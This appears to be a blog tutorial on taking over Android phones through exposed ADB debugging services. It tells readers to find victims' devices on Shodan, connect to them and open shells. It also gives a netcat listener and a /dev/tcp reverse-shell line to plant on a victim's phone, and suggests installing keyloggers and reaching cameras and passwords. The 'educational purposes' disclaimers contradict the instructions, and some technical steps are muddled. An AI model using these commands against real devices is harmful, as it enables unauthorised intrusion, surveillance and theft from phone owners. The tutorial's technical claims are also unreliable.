How to hack Android device with ADB (Android debugging bridge )
In this article, I am going to show you how easy it is to hacking android phones using only one tool which is Android Debugging bridge. ADB is meant for developers to test and make new android apps and check their behavior on different versions of android.
But hackers can easily use this tool to hack any android devices on the internet if the adb server daemon is running.
So without further ado, let’s start hacking.
Requirements
- Internet
- Android debugging server should be on
- Adb installed on the system.
Step 1: Installing adb on the system
Adb is an open-source tool which can be installed on any windows or Linux distro.
For Linux type the following command
sudo apt-get install adb
For windows, download and install android studio, or minimal adb.
Step 2: Find vulnerable devices.
To find vulnerable devices running adb daemon service, visit shodan.io
Shodan is a search engine which indexes all the live devices on the internet. Search for the keyword android debug bridge. You will get a list of thousands of hackable android devices running vulnerable adb service. You can hack any one of them for testing purposes.
Step 3: Exploiting the vulnerable devices
In step 1, we have already installed adb. Now we need to exploit the devices with the vulnerable adb service.
After Installing adb, type the following command:
connect <remote_ip>.
Here the remote IP is the address of the victim you found on shodan.
Upon having a successful connection, you will be able to get a shell on the android device by using the command
adb shell.
As you can see above, we have gotten a root shell on the victim android device.
With this shell, we can basically hack into anything and access all files folders and even passwords. By using custom scripts, we can also install keyloggers and hack android camera as well.
Well, are you satisfies with his hack.? Probably does not let see one more method of hacking android with adb
Hacking android with ADB
Now, to start this hack, we need a pc with adb installed. If you tried the previous method, this is already done. This method is a variant of the original port 5555 attack strategy reported in the wild, but they are the same thing but does it on port 6699 instead.
Step 1: Start your Kali Linux terminal.
Type the following command:
netcat with nc -lvp 6699.
Step 2: Run the script or commands on the victim`s system
Get the following lines of code as a script file into the victim’s phone either through SD card, your website, or inject the following into Android devices using any of the other hacks.
Exploit and run the following commands on the victim android device
adb connect {replace_with_victim_ip}:6699
adb shell sh -i >& /dev/tcp/{replace_with_your_ip}/6699 0>&1
With this, you will get an android shell to exploit the android device.
That’s it. You should now get a reverse shell on any Android device when the victim invokes the above lines of code on the same network. And with adb, you will never need execution permission on non-rooted devices since you are already an admin in adb.
This is why this hack is powerfull and amazing because you do need any technical knowledge for it. Even a caveman could use this hack to hack android devices using adb.
What is adb really?
Android Debug Bridge (adb) is an android command-line tool that lets you communicate with a device. The adb command helps you perform any of the android device actions, such as installing and debugging apps and running scripts and shells, since this app was meant for developers in the first place.
It is an essentially a client-server program that includes the following three components:
- A client, which sends commands. The client runs on your system machine. You can invoke a client from a command-line terminal by issuing an adb command as we did above.
- A daemon (android debugging bridge), which runs commands on a device. The daemon runs as a background process on each device and is originally meant for Android developers.
- An adb server is a server which manages communication between the client and the daemon. The server runs as a background process on your system, which communicated with the device once the connection is successful.
Conclusion of adb android hack
One thing is for sure that if platforms such as android do not keep proper security and measures. They end up having many weak default security configurations and security flaws as we have just seen.
The weak security and flaws directly provide hackers with a wide variety of attack surfaces to choose from. Hence, regardless of whether or not you have an antivirus or a security software if there is bug or security flaw in the kernel architecture itself then the devices will be hacked in spite of all security measures.
Commonly asked questions about hacking android with adb.
Q.1 Is hacking with android debug bridge hack legal?
No. It is not meant for hacking people. It is a tool meant for white hat pentesting only and should be used with the same intent. Hacking World is not responsible for any illegal use done by you.
Q.2 I want to hack my girlfriend’s phone how do I do it?
We do not support black hat hacking, and we do not reply and respond to such requests. This article is meant only for educational purposes.
Q.3 Can I use kali Linux with on my phone to use this hack?
Yes, you can use the termux app, or you can use kali Linux nethunter to hack android devices with adb.
